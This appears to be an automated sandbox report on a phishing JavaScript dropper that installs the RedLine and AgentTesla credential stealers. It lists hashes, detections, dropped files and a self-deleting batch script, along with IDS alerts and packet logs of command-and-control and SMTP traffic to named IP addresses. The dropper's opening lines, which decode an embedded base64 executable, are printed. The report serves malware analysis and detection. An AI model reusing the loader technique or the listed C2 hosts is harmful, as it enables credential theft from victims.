                                                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                Malicious:false
                                                                                Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                Process:C:\Windows\SysWOW64\svchost.exe
                                                                                File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                Category:dropped
                                                                                Size (bytes):307712
                                                                                Entropy (8bit):5.081289674980977
                                                                                Encrypted:false
                                                                                SSDEEP:3072:acZqf7D34Tp/0+mA0kywMlQEg85fB1fA0PuTVAtkxzZ3RMeqiOL2bBOA:acZqf7DItnGCQNB1fA0GTV8kv0L
                                                                                MD5:3B6501FEEF6196F24163313A9F27DBFD
                                                                                SHA1:20D60478D3C161C3CACB870AAC06BE1B43719228
                                                                                SHA-256:0576191C50A1B6AFBCAA5CB0512DF5B6A8B9BEF9739E5308F8E2E965BF9B0FC5
                                                                                SHA-512:338E2C450A0B1C5DFEA3CD3662051CE231A53388BC2A6097347F14D3A59257CE3734D934DB1992676882B5F4F6A102C7E15B142434575B8970658B4833D23676
                                                                                Malicious:true
                                                                                Yara Hits:
                                                                                • Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: C:\Users\user\AppData\Local\Temp\build.exe, Author: Joe Security
                                                                                Antivirus:
                                                                                • Antivirus: Avira, Detection: 100%
                                                                                • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                • Antivirus: ReversingLabs, Detection: 92%
                                                                                Joe Sandbox View:
                                                                                • Filename: RFQ_PO-WDX73892970.vbs, Detection: malicious
                                                                                • Filename: RFQ_PO_KMM7983972_ORDER_DETAILS.js, Detection: malicious
                                                                                • Filename: NEOM_SUPPLIER_EOI&QUESTIONNAIR_FORM_SHEET.PDF.EXE, Detection: malicious
                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....H(...............0.................. ... ....@.. ....................... ............@.................................<...O.... ............................................................................... ............... ..H............text........ ...................... ..`.rsrc........ ......................@..@.reloc..............................@..B................p.......H....... ...............(w..............................................a.u.t.o.f.i.l.l.5.t.Y.W.R.q.a.W.V.o.a.m.h.h.a.m.J.8.W.W.9.y.b.2.l.X.Y.W.x.s.Z.X.Q.K.a.W.J.u.Z.W.p.k.Z.m.p.t.b.W.t.w.Y.2.5.s.c.G.V.i.a.2.x.t.b.m.t.v.Z.W.9.p.a.G.9.m.Z.W.N.8.V.H.J.v.b.m.x.p.b.m.s.K.a.m.J.k.Y.W.9.j.b.m.V.p.a.W.l.u.b.W.p.i.a.m.x.n.Y.W.x.o.Y.2.V.s.Z.2.J.l.a.m.1.u.a.W.R.8.T.m.l.m.d.H.l.X.Y.W.x.s.Z.X.Q.K.b.m.t.i.a.W.h.m.Y.m.V.v.Z.2.F.l.Y.W.9.l.a.G.x.l.Z.m.5.r.b.2.R.i.Z.W.Z.n.c.G.d.r.b.m.5.8.T.W.
                                                                                Process:C:\Windows\SysWOW64\svchost.exe
                                                                                File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                Category:dropped
                                                                                Size (bytes):250368
                                                                                Entropy (8bit):5.008874766930935
                                                                                Encrypted:false
                                                                                SSDEEP:3072:K5rmOKmqOPQrF5Z6YzyV29z556CWZxtm:KBmOKmqOPQrF/6YP9zZWjt
                                                                                MD5:D6A4CF0966D24C1EA836BA9A899751E5
                                                                                SHA1:392D68C000137B8039155DF6BB331D643909E7E7
                                                                                SHA-256:DC441006CB45C2CFAC6C521F6CD4C16860615D21081563BD9E368DE6F7E8AB6B
                                                                                SHA-512:9FA7AA65B4A0414596D8FD3E7D75A09740A5A6C3DB8262F00CB66CD4C8B43D17658C42179422AE0127913DEB854DB7ED02621D0EEB8DDFF1FAC221A8E0D1CA35
                                                                                Malicious:true
                                                                                Yara Hits:
                                                                                • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: C:\Users\user\AppData\Local\Temp\neworigin.exe, Author: Joe Security
                                                                                • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: C:\Users\user\AppData\Local\Temp\neworigin.exe, Author: Joe Security
                                                                                • Rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID, Description: Detects executables referencing Windows vault credential objects. Observed in infostealers, Source: C:\Users\user\AppData\Local\Temp\neworigin.exe, Author: ditekSHen
                                                                                Antivirus:
                                                                                • Antivirus: Avira, Detection: 100%
                                                                                • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                • Antivirus: ReversingLabs, Detection: 79%
                                                                                Joe Sandbox View:
                                                                                • Filename: ORDER_DOCU_NWQ89403984-DETAILS.MPEG.PNG.CMD.cmd, Detection: malicious
                                                                                • Filename: RFQ_PO_KMM7983972_ORDER_DETAILS.js, Detection: malicious
                                                                                • Filename: ORDER_DOCUMENT_PO_GQB793987646902.TXT.MPEG.PNG.CMD.cmd, Detection: malicious
                                                                                • Filename: NEOM_SUPPLIER_EOI&QUESTIONNAIR_FORM_SHEET.PDF.EXE, Detection: malicious
                                                                                • Filename: Order SMG 201906 20190816orderGMD#0498366Deta.exe, Detection: malicious
                                                                                Process:C:\Windows\SysWOW64\svchost.exe
                                                                                File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                Category:dropped
                                                                                Size (bytes):231936
                                                                                Entropy (8bit):5.039764014369673
                                                                                Encrypted:false
                                                                                SSDEEP:3072:ocaWxnNbVzunOKrp3gGhTbUwjI4C2rpdf1/0dDQFd4jiSCvpoV6l7Mp:PNbhKrpnTbxT18dUFVS6lg
                                                                                MD5:50D015016F20DA0905FD5B37D7834823
                                                                                SHA1:6C39C84ACF3616A12AE179715A3369C4E3543541
                                                                                SHA-256:36FE89B3218D2D0BBF865967CDC01B9004E3BA13269909E3D24D7FF209F28FC5
                                                                                SHA-512:55F639006A137732B2FA0527CD1BE24B58F5DF387CE6AA6B8DD47D1419566F87C95FC1A6B99383E8BD0BCBA06CC39AD7B32556496E46D7220C6A7B6D8390F7FC
                                                                                Malicious:true
                                                                                Antivirus:
                                                                                • Antivirus: Avira, Detection: 100%
                                                                                • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                • Antivirus: ReversingLabs, Detection: 83%
                                                                                Process:C:\Users\user\AppData\Local\Temp\x.exe
                                                                                File Type:data
                                                                                Category:dropped
                                                                                Size (bytes):1375744
                                                                                Entropy (8bit):7.833560173263823
                                                                                Encrypted:false
                                                                                SSDEEP:24576:f8wePJEHebqzk288kcdrarH4iRhJlLfsXpSos6P7j2KqQxi3SOIQ:0wehEHHzkv8XYr9lLE8os0j22xOt
                                                                                MD5:8631B355627AE1EFB5D1EDB43D0D377A
                                                                                SHA1:8209A5670E41F0BFF4A1B32967D72C0F814C08BB
                                                                                SHA-256:00BCB1DEF7468594CB071AFE44DFA7BF015CFE3AFE6D7E4A8D6242C8296F0D04
                                                                                SHA-512:341C9AA6F475A7EC813BD4DB643457E5CB37E5EB1D6C315552A161C6ED7F2B07A1E6D00763E0D025BA46195A3569E6BD6A6D258D10EF28C5C6940CCE7423E11B
                                                                                Malicious:false
                                                                                Process:C:\Users\user\AppData\Local\Temp\server_BTC.exe
                                                                                File Type:DOS batch file, ASCII text, with CRLF line terminators
                                                                                Category:dropped
                                                                                Size (bytes):164
                                                                                Entropy (8bit):5.01536063413633
                                                                                Encrypted:false
                                                                                SSDEEP:3:mKDDCMNvFbuov3DCHyg4E2J5xAIJWAdEFKDwU1hGDCHyg4E2J5xAInTRI5yLRIQK:hWKdbuoLCHhJ23fJWAawDNeCHhJ23fT2
                                                                                MD5:01CBBB372040FAC83A160BA5191611ED
                                                                                SHA1:C34367F2965E8BFBF6515DCD8160B924B3E8EC16
                                                                                SHA-256:1AE43158FA5EB183ED9324614B187A9781F39DF8C65607B26649E383EC363FD7
                                                                                SHA-512:4982EAA35B657D74500412D8C91A9BC4A06CBFCDDB35B57734D4236BA3FC77FA669BC129C2D55A3AB1D62BA0797F75A8E85384C86A7277617DBD4F48B7661826
                                                                                Malicious:false
                                                                                Preview:@echo off..timeout 6 > NUL..CD C:\Users\user\AppData\Local\Temp..DEL "server_BTC.exe" /f /q..CD C:\Users\user\AppData\Local\Temp\..DEL "tmp6964.tmp.cmd" /f /q..
                                                                                Process:C:\Windows\System32\wscript.exe
                                                                                File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                Category:dropped
                                                                                Size (bytes):3657539
                                                                                Entropy (8bit):7.903394754348056
                                                                                Encrypted:false
                                                                                SSDEEP:98304:7trbTA1qy46WARSBOunlQ6WVIf007uBOr0T2C:hc1c23afb8Org2C
                                                                                MD5:E7114D96EC31D8CD1C0233BD949D1E0F
                                                                                SHA1:6433ACE48FC9A6D4DE4451D0A35C91AF7C69D507
                                                                                SHA-256:771B160A95FB3BAFE050A2E5552A1C697A5982773104C6A2B9549B538935ED23
                                                                                SHA-512:66D19FD4EEA704B67E5F3568590EBE3EA42CDB0426FA4BAFBDB35814F9FAC21AC37126E4A3EA238F8DFB8E5CD5C2BDBE4DB60A26B72CE3883F40C6BA4D2113D7
                                                                                Malicious:true
                                                                                Antivirus:
                                                                                • Antivirus: Avira, Detection: 100%
                                                                                • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                Process:C:\Users\user\AppData\Local\Temp\server_BTC.exe
                                                                                File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                Category:dropped
                                                                                Size (bytes):231936
                                                                                Entropy (8bit):5.039764014369673
                                                                                Encrypted:false
                                                                                SSDEEP:3072:ocaWxnNbVzunOKrp3gGhTbUwjI4C2rpdf1/0dDQFd4jiSCvpoV6l7Mp:PNbhKrpnTbxT18dUFVS6lg
                                                                                MD5:50D015016F20DA0905FD5B37D7834823
                                                                                SHA1:6C39C84ACF3616A12AE179715A3369C4E3543541
                                                                                SHA-256:36FE89B3218D2D0BBF865967CDC01B9004E3BA13269909E3D24D7FF209F28FC5
                                                                                SHA-512:55F639006A137732B2FA0527CD1BE24B58F5DF387CE6AA6B8DD47D1419566F87C95FC1A6B99383E8BD0BCBA06CC39AD7B32556496E46D7220C6A7B6D8390F7FC
                                                                                Malicious:true
                                                                                Antivirus:
                                                                                • Antivirus: Avira, Detection: 100%
                                                                                • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                • Antivirus: ReversingLabs, Detection: 83%
                                                                                Process:C:\Users\user\AppData\Local\Temp\server_BTC.exe
                                                                                File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Description string, Has Relative path, Icon number=0, Archive, ctime=Thu Sep 26 06:21:42 2024, mtime=Thu Sep 26 06:21:42 2024, atime=Thu Sep 26 06:21:39 2024, length=231936, window=
                                                                                Category:dropped
                                                                                Size (bytes):1794
                                                                                Entropy (8bit):3.508182621163374
                                                                                Encrypted:false
                                                                                SSDEEP:24:8qHn8pwNsf5UAZs4FSnclwO4ZTqlLi7i9m:8qHn8y6f9S4+clwZTqlCC
                                                                                MD5:94DD92817ADD3C87CB8939F308EBA8FD
                                                                                SHA1:38029F47BD5EB4E5C37CF2D2AA2148139F54FE13
                                                                                SHA-256:32E085163262D822BF73AE56C2F568FEA755E20481FC0AC0F3AB7287A7CFBE7B
                                                                                SHA-512:87A55CE401C6A15F6D9C1576DD25B1C0172E51EAE9754D0DB0564441281BE136E89CE222C654744DE3D3B1E90E2940E066F5FD65869E56B6C85F6B875CA9E346
                                                                                Malicious:false
                                                                                Preview:L..................F.@.. ....iE.......G.......\...............................:..DG..Yr?.D..U..k0.&...&.......y.Yd....z%.....Y.J.........t...CFSF..1.....EW)B..AppData...t.Y^...H.g.3..(.....gVA.G..k...@......EW)B:Y.:..........................d...A.p.p.D.a.t.a...B.V.1.....:Y.:..Roaming.@......EW)B:Y.:..........................u..R.o.a.m.i.n.g.....T.1.....:Y.:..ACCApi..>......:Y.::Y.:...........................N..A.C.C.A.p.i.....l.2.....:Y.: .TROJAN~1.EXE..P......:Y.::Y.:.....!....................u..T.r.o.j.a.n.A.I.b.o.t...e.x.e.......e...............-.......d...........2.\......C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe....A.c.c.S.y.s.%.....\.....\.....\.....\.....\.A.C.C.A.p.i.\.T.r.o.j.a.n.A.I.b.o.t...e.x.e.1.C.:.\.U.s.e.r.s.\.h.u.b.e.r.t.\.A.p.p.D.a.t.a.\.L.o.c.a.l.\.T.e.m.p.\.s.e.r.v.e.r._.B.T.C...e.x.e.........%USERPROFILE%\AppData\Local\Temp\server_BTC.exe............................................................................................................
                                                                                Process:C:\Windows\SysWOW64\svchost.exe
                                                                                File Type:data
                                                                                Category:dropped
                                                                                Size (bytes):12320
                                                                                Entropy (8bit):7.985565352934576
                                                                                Encrypted:false
                                                                                SSDEEP:192:GfPVMGiuhQJ82+fXwJkPlJV/47YoEeIlX1CS+UvhbDPIopxp5B1x9A4R:sjitJ8tXwetQLsZ1HPZ/PIoZZx9pR
                                                                                MD5:E49333D73E0424BD8083EF93C2B15444
                                                                                SHA1:8325435F2DF2FCDEFED04EF67FD8735AD1906019
                                                                                SHA-256:68F368D37EC656986BEF3C4AA8176C70D0852250E074346EE0C85115BF75E9F9
                                                                                SHA-512:FB72859F6945A3344507D8321A8CF2BF3F161D92BB8F594394D4F1CC843199A69FE34FD4A8335323E1C5523AA858733B5E4AAB80B07E8D12A88D7CDAE736849C
                                                                                Malicious:false
                                                                                Process:C:\Windows\SysWOW64\timeout.exe
                                                                                File Type:ASCII text, with CRLF line terminators, with overstriking
                                                                                Category:dropped
                                                                                Size (bytes):66
                                                                                Entropy (8bit):4.524640141725149
                                                                                Encrypted:false
                                                                                SSDEEP:3:hYF0ZAR+mQRKVxLZQtL1yn:hYFoaNZQtLMn
                                                                                MD5:04A92849F3C0EE6AC36734C600767EFA
                                                                                SHA1:C77B1FF27BC49AB80202109B35C38EE3548429BD
                                                                                SHA-256:28B3755A05430A287E4DAFA9F8D8EF27F1EDA4C65E971E42A7CA5E5D4FAE5023
                                                                                SHA-512:6D67DF8175522BF45E7375932754B1CA3234292D7B1B957D1F68E4FABE6E7DA0FC52C6D22CF1390895300BA7F14E645FCDBF9DCD14375D8D43A3646C0E338704
                                                                                Malicious:false
                                                                                Preview:..Waiting for 6 seconds, press a key to continue ....5.4.3.2.1.0..
                                                                                File type:ASCII text, with very long lines (65438), with CRLF line terminators
                                                                                Entropy (8bit):5.971360564283784
                                                                                TrID:
                                                                                  File name:RFQ -PO.20571-0001-QBMS-PRQ-0200140.js
                                                                                  File size:4'877'072 bytes
                                                                                  MD5:5e1cdaa87915b9b6e7d852c0b7ce272b
                                                                                  SHA1:978f40e995fe1fd0e10f73f8b7924dd31ffb6267
                                                                                  SHA256:3335d593c4a2f7ab94a35fd5a0991026d1800592a18cc842686d3bf6bb66503d
                                                                                  SHA512:94e1811a87af0165989d69732d20f1c00981eeeb15ed976b01ff9afcdd41a38ff201252f8e003bba92541757603c29b80c69c897fc41cab51ad88b7698754425
                                                                                  SSDEEP:49152:Dy0k7TbmSOqsmBdkQUUb/YnBxbb20HelA1mvpxVAm8Zp0v97quF8yAmhR/:2
                                                                                  TLSH:043612328D23BCBF175C364AA01D1E461E941EC392999BB4DA8914B776CC701DE3E8BD
                                                                                  File Content Preview:var D=new ActiveXObject("Microsoft.XMLDOM")..var E=D.createElement("t")..E.dataType="bin.base64"..E.text="TVqQAAMAAAAEAAAA//8AALgAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA+AAAAA4fug4AtAnNIbgBTM0hVGhpcyBwcm9ncmFtIGNhbm5vdCBiZSBydW4gaW4gRE9TI
                                                                                  Icon Hash:68d69b8bb6aa9a86
                                                                                  Timestamp | SID | Signature | Severity | Source IP | Source Port | Dest IP | Dest Port | Protocol
                                                                                  2024-09-26T09:21:45.819379+0200 | 2043231 | ET MALWARE Redline Stealer TCP CnC Activity | 1 | 192.168.2.8 | 62827 | 212.162.149.53 | 2049 | TCP
                                                                                  2024-09-26T09:21:45.819379+0200 | 2046045 | ET MALWARE [ANY.RUN] RedLine Stealer/MetaStealer Family Related (MC-NMF Authorization) | 1 | 192.168.2.8 | 62827 | 212.162.149.53 | 2049 | TCP
                                                                                  2024-09-26T09:21:45.974042+0200 | 2043234 | ET MALWARE Redline Stealer TCP CnC - Id1Response | 1 | 212.162.149.53 | 2049 | 192.168.2.8 | 62827 | TCP
                                                                                  2024-09-26T09:21:51.238622+0200 | 2043231 | ET MALWARE Redline Stealer TCP CnC Activity | 1 | 192.168.2.8 | 62827 | 212.162.149.53 | 2049 | TCP
                                                                                  2024-09-26T09:21:51.604628+0200 | 2043231 | ET MALWARE Redline Stealer TCP CnC Activity | 1 | 192.168.2.8 | 62827 | 212.162.149.53 | 2049 | TCP
                                                                                  2024-09-26T09:21:51.828606+0200 | 2043231 | ET MALWARE Redline Stealer TCP CnC Activity | 1 | 192.168.2.8 | 62827 | 212.162.149.53 | 2049 | TCP
                                                                                  2024-09-26T09:21:51.913733+0200 | 2046056 | ET MALWARE Redline Stealer/MetaStealer Family Activity (Response) | 1 | 212.162.149.53 | 2049 | 192.168.2.8 | 62827 | TCP
                                                                                  2024-09-26T09:21:52.108691+0200 | 2043231 | ET MALWARE Redline Stealer TCP CnC Activity | 1 | 192.168.2.8 | 62827 | 212.162.149.53 | 2049 | TCP
                                                                                  2024-09-26T09:21:53.186085+0200 | 2043231 | ET MALWARE Redline Stealer TCP CnC Activity | 1 | 192.168.2.8 | 62827 | 212.162.149.53 | 2049 | TCP
                                                                                  2024-09-26T09:21:53.875047+0200 | 2043231 | ET MALWARE Redline Stealer TCP CnC Activity | 1 | 192.168.2.8 | 62827 | 212.162.149.53 | 2049 | TCP
                                                                                  2024-09-26T09:21:54.077941+0200 | 2043231 | ET MALWARE Redline Stealer TCP CnC Activity | 1 | 192.168.2.8 | 62827 | 212.162.149.53 | 2049 | TCP
                                                                                  2024-09-26T09:21:54.211040+0200 | 2043231 | ET MALWARE Redline Stealer TCP CnC Activity | 1 | 192.168.2.8 | 62827 | 212.162.149.53 | 2049 | TCP
                                                                                  2024-09-26T09:21:54.356399+0200 | 2043231 | ET MALWARE Redline Stealer TCP CnC Activity | 1 | 192.168.2.8 | 62827 | 212.162.149.53 | 2049 | TCP
                                                                                  2024-09-26T09:21:55.060897+0200 | 2043231 | ET MALWARE Redline Stealer TCP CnC Activity | 1 | 192.168.2.8 | 62827 | 212.162.149.53 | 2049 | TCP
                                                                                  2024-09-26T09:21:55.238452+0200 | 2043231 | ET MALWARE Redline Stealer TCP CnC Activity | 1 | 192.168.2.8 | 62827 | 212.162.149.53 | 2049 | TCP
                                                                                  2024-09-26T09:21:56.197571+0200 | 2043231 | ET MALWARE Redline Stealer TCP CnC Activity | 1 | 192.168.2.8 | 62827 | 212.162.149.53 | 2049 | TCP
                                                                                  2024-09-26T09:21:56.202778+0200 | 2043231 | ET MALWARE Redline Stealer TCP CnC Activity | 1 | 192.168.2.8 | 62827 | 212.162.149.53 | 2049 | TCP
                                                                                  2024-09-26T09:21:57.257223+0200 | 2043231 | ET MALWARE Redline Stealer TCP CnC Activity | 1 | 192.168.2.8 | 62827 | 212.162.149.53 | 2049 | TCP
                                                                                  2024-09-26T09:21:57.395273+0200 | 2043231 | ET MALWARE Redline Stealer TCP CnC Activity | 1 | 192.168.2.8 | 62827 | 212.162.149.53 | 2049 | TCP
                                                                                  2024-09-26T09:21:57.625513+0200 | 2043231 | ET MALWARE Redline Stealer TCP CnC Activity | 1 | 192.168.2.8 | 62827 | 212.162.149.53 | 2049 | TCP
                                                                                  2024-09-26T09:21:57.654624+0200 | 2043231 | ET MALWARE Redline Stealer TCP CnC Activity | 1 | 192.168.2.8 | 62827 | 212.162.149.53 | 2049 | TCP
                                                                                  2024-09-26T09:22:00.347751+0200 | 2043231 | ET MALWARE Redline Stealer TCP CnC Activity | 1 | 192.168.2.8 | 62827 | 212.162.149.53 | 2049 | TCP
                                                                                  2024-09-26T09:22:00.518185+0200 | 2043231 | ET MALWARE Redline Stealer TCP CnC Activity | 1 | 192.168.2.8 | 62827 | 212.162.149.53 | 2049 | TCP
                                                                                  2024-09-26T09:22:00.686262+0200 | 2043231 | ET MALWARE Redline Stealer TCP CnC Activity | 1 | 192.168.2.8 | 62827 | 212.162.149.53 | 2049 | TCP
                                                                                  2024-09-26T09:22:01.476954+0200 | 2043231 | ET MALWARE Redline Stealer TCP CnC Activity | 1 | 192.168.2.8 | 62827 | 212.162.149.53 | 2049 | TCP
                                                                                  2024-09-26T09:22:01.648761+0200 | 2043231 | ET MALWARE Redline Stealer TCP CnC Activity | 1 | 192.168.2.8 | 62827 | 212.162.149.53 | 2049 | TCP
                                                                                  2024-09-26T09:22:01.809750+0200 | 2043231 | ET MALWARE Redline Stealer TCP CnC Activity | 1 | 192.168.2.8 | 62827 | 212.162.149.53 | 2049 | TCP
                                                                                  2024-09-26T09:22:02.168029+0200 | 2043231 | ET MALWARE Redline Stealer TCP CnC Activity | 1 | 192.168.2.8 | 62827 | 212.162.149.53 | 2049 | TCP
                                                                                  2024-09-26T09:22:02.584849+0200 | 2043231 | ET MALWARE Redline Stealer TCP CnC Activity | 1 | 192.168.2.8 | 62827 | 212.162.149.53 | 2049 | TCP
Timestamp                             Source Port  Dest Port  Source IP       Dest IP
Sep 26, 2024 09:21:42.491238117 CEST  62826        443        192.168.2.8     104.26.13.205
Sep 26, 2024 09:21:42.491292953 CEST  443          62826      104.26.13.205   192.168.2.8
Sep 26, 2024 09:21:42.491367102 CEST  62826        443        192.168.2.8     104.26.13.205
Sep 26, 2024 09:21:42.499555111 CEST  62826        443        192.168.2.8     104.26.13.205
Sep 26, 2024 09:21:42.499577045 CEST  443          62826      104.26.13.205   192.168.2.8
Sep 26, 2024 09:21:42.970721006 CEST  443          62826      104.26.13.205   192.168.2.8
Sep 26, 2024 09:21:42.970810890 CEST  62826        443        192.168.2.8     104.26.13.205
Sep 26, 2024 09:21:42.996426105 CEST  62826        443        192.168.2.8     104.26.13.205
Sep 26, 2024 09:21:42.996452093 CEST  443          62826      104.26.13.205   192.168.2.8
Sep 26, 2024 09:21:42.996891975 CEST  443          62826      104.26.13.205   192.168.2.8
Sep 26, 2024 09:21:43.187968016 CEST  62826        443        192.168.2.8     104.26.13.205
Sep 26, 2024 09:21:43.584867954 CEST  62826        443        192.168.2.8     104.26.13.205
Sep 26, 2024 09:21:43.627405882 CEST  443          62826      104.26.13.205   192.168.2.8
Sep 26, 2024 09:21:44.230170012 CEST  443          62826      104.26.13.205   192.168.2.8
Sep 26, 2024 09:21:44.230257034 CEST  443          62826      104.26.13.205   192.168.2.8
Sep 26, 2024 09:21:44.230314970 CEST  62826        443        192.168.2.8     104.26.13.205
Sep 26, 2024 09:21:44.236763000 CEST  62826        443        192.168.2.8     104.26.13.205
Sep 26, 2024 09:21:44.633270979 CEST  62827        2049       192.168.2.8     212.162.149.53
Sep 26, 2024 09:21:44.638832092 CEST  2049         62827      212.162.149.53  192.168.2.8
Sep 26, 2024 09:21:44.638906956 CEST  62827        2049       192.168.2.8     212.162.149.53
Sep 26, 2024 09:21:44.660520077 CEST  62827        2049       192.168.2.8     212.162.149.53
Sep 26, 2024 09:21:44.675995111 CEST  2049         62827      212.162.149.53  192.168.2.8
Sep 26, 2024 09:21:45.771760941 CEST  2049         62827      212.162.149.53  192.168.2.8
Sep 26, 2024 09:21:45.772000074 CEST  2049         62827      212.162.149.53  192.168.2.8
Sep 26, 2024 09:21:45.772067070 CEST  62827        2049       192.168.2.8     212.162.149.53
Sep 26, 2024 09:21:45.772136927 CEST  2049         62827      212.162.149.53  192.168.2.8
Sep 26, 2024 09:21:45.772265911 CEST  62827        2049       192.168.2.8     212.162.149.53
Sep 26, 2024 09:21:45.788741112 CEST  62828        587        192.168.2.8     51.195.88.199
Sep 26, 2024 09:21:45.794917107 CEST  587          62828      51.195.88.199   192.168.2.8
Sep 26, 2024 09:21:45.794996023 CEST  62828        587        192.168.2.8     51.195.88.199
Sep 26, 2024 09:21:45.819379091 CEST  62827        2049       192.168.2.8     212.162.149.53
Sep 26, 2024 09:21:45.825978041 CEST  2049         62827      212.162.149.53  192.168.2.8
Sep 26, 2024 09:21:45.974041939 CEST  2049         62827      212.162.149.53  192.168.2.8
Sep 26, 2024 09:21:46.172965050 CEST  62827        2049       192.168.2.8     212.162.149.53
Sep 26, 2024 09:21:46.521976948 CEST  587          62828      51.195.88.199   192.168.2.8
Sep 26, 2024 09:21:46.527331114 CEST  62828        587        192.168.2.8     51.195.88.199
Sep 26, 2024 09:21:46.532233953 CEST  587          62828      51.195.88.199   192.168.2.8
Sep 26, 2024 09:21:46.708118916 CEST  587          62828      51.195.88.199   192.168.2.8
Sep 26, 2024 09:21:46.713567972 CEST  62828        587        192.168.2.8     51.195.88.199
Sep 26, 2024 09:21:46.718381882 CEST  587          62828      51.195.88.199   192.168.2.8
Sep 26, 2024 09:21:46.895086050 CEST  587          62828      51.195.88.199   192.168.2.8
Sep 26, 2024 09:21:46.895541906 CEST  62828        587        192.168.2.8     51.195.88.199
Sep 26, 2024 09:21:46.900439024 CEST  587          62828      51.195.88.199   192.168.2.8
Sep 26, 2024 09:21:47.086836100 CEST  587          62828      51.195.88.199   192.168.2.8
Sep 26, 2024 09:21:47.086860895 CEST  587          62828      51.195.88.199   192.168.2.8
Sep 26, 2024 09:21:47.086885929 CEST  587          62828      51.195.88.199   192.168.2.8
Sep 26, 2024 09:21:47.086914062 CEST  62828        587        192.168.2.8     51.195.88.199
Sep 26, 2024 09:21:47.120405912 CEST  62828        587        192.168.2.8     51.195.88.199
Sep 26, 2024 09:21:47.125447035 CEST  587          62828      51.195.88.199   192.168.2.8
Sep 26, 2024 09:21:47.301140070 CEST  587          62828      51.195.88.199   192.168.2.8
Sep 26, 2024 09:21:47.305260897 CEST  62828        587        192.168.2.8     51.195.88.199
Sep 26, 2024 09:21:47.310146093 CEST  587          62828      51.195.88.199   192.168.2.8
Sep 26, 2024 09:21:47.488697052 CEST  587          62828      51.195.88.199   192.168.2.8
Sep 26, 2024 09:21:47.513219118 CEST  62828        587        192.168.2.8     51.195.88.199
Sep 26, 2024 09:21:47.518095016 CEST  587          62828      51.195.88.199   192.168.2.8
Sep 26, 2024 09:21:47.694093943 CEST  587          62828      51.195.88.199   192.168.2.8
Sep 26, 2024 09:21:47.695127010 CEST  62828        587        192.168.2.8     51.195.88.199
Sep 26, 2024 09:21:47.699958086 CEST  587          62828      51.195.88.199   192.168.2.8
Sep 26, 2024 09:21:47.882879019 CEST  587          62828      51.195.88.199   192.168.2.8
Sep 26, 2024 09:21:47.883146048 CEST  62828        587        192.168.2.8     51.195.88.199
Sep 26, 2024 09:21:47.889050007 CEST  587          62828      51.195.88.199   192.168.2.8
Sep 26, 2024 09:21:48.063831091 CEST  587          62828      51.195.88.199   192.168.2.8
Sep 26, 2024 09:21:48.064160109 CEST  62828        587        192.168.2.8     51.195.88.199
Sep 26, 2024 09:21:48.068965912 CEST  587          62828      51.195.88.199   192.168.2.8
Sep 26, 2024 09:21:48.250420094 CEST  587          62828      51.195.88.199   192.168.2.8
Sep 26, 2024 09:21:48.250808954 CEST  62828        587        192.168.2.8     51.195.88.199
Sep 26, 2024 09:21:48.255562067 CEST  587          62828      51.195.88.199   192.168.2.8
Sep 26, 2024 09:21:48.431370974 CEST  587          62828      51.195.88.199   192.168.2.8
Sep 26, 2024 09:21:48.432207108 CEST  62828        587        192.168.2.8     51.195.88.199
Sep 26, 2024 09:21:48.432377100 CEST  62828        587        192.168.2.8     51.195.88.199
Sep 26, 2024 09:21:48.432472944 CEST  62828        587        192.168.2.8     51.195.88.199
Sep 26, 2024 09:21:48.432590961 CEST  62828        587        192.168.2.8     51.195.88.199
Sep 26, 2024 09:21:48.437038898 CEST  587          62828      51.195.88.199   192.168.2.8
Sep 26, 2024 09:21:48.437083960 CEST  587          62828      51.195.88.199   192.168.2.8
Sep 26, 2024 09:21:48.437289000 CEST  587          62828      51.195.88.199   192.168.2.8
Sep 26, 2024 09:21:48.437347889 CEST  587          62828      51.195.88.199   192.168.2.8
Sep 26, 2024 09:21:48.786349058 CEST  587          62828      51.195.88.199   192.168.2.8
Sep 26, 2024 09:21:48.889149904 CEST  62828        587        192.168.2.8     51.195.88.199
Sep 26, 2024 09:21:48.894103050 CEST  587          62828      51.195.88.199   192.168.2.8
Sep 26, 2024 09:21:49.070702076 CEST  587          62828      51.195.88.199   192.168.2.8
Sep 26, 2024 09:21:49.099893093 CEST  62828        587        192.168.2.8     51.195.88.199
Sep 26, 2024 09:21:49.100748062 CEST  62829        587        192.168.2.8     51.195.88.199
Sep 26, 2024 09:21:49.105655909 CEST  587          62829      51.195.88.199   192.168.2.8
Sep 26, 2024 09:21:49.105739117 CEST  62829        587        192.168.2.8     51.195.88.199
Sep 26, 2024 09:21:49.888391972 CEST  587          62829      51.195.88.199   192.168.2.8
Sep 26, 2024 09:21:49.888659954 CEST  62829        587        192.168.2.8     51.195.88.199
Sep 26, 2024 09:21:49.893692017 CEST  587          62829      51.195.88.199   192.168.2.8
Sep 26, 2024 09:21:50.197284937 CEST  587          62829      51.195.88.199   192.168.2.8
Sep 26, 2024 09:21:50.197479010 CEST  62829        587        192.168.2.8     51.195.88.199
Sep 26, 2024 09:21:50.202254057 CEST  587          62829      51.195.88.199   192.168.2.8
Sep 26, 2024 09:21:50.379153967 CEST  587          62829      51.195.88.199   192.168.2.8
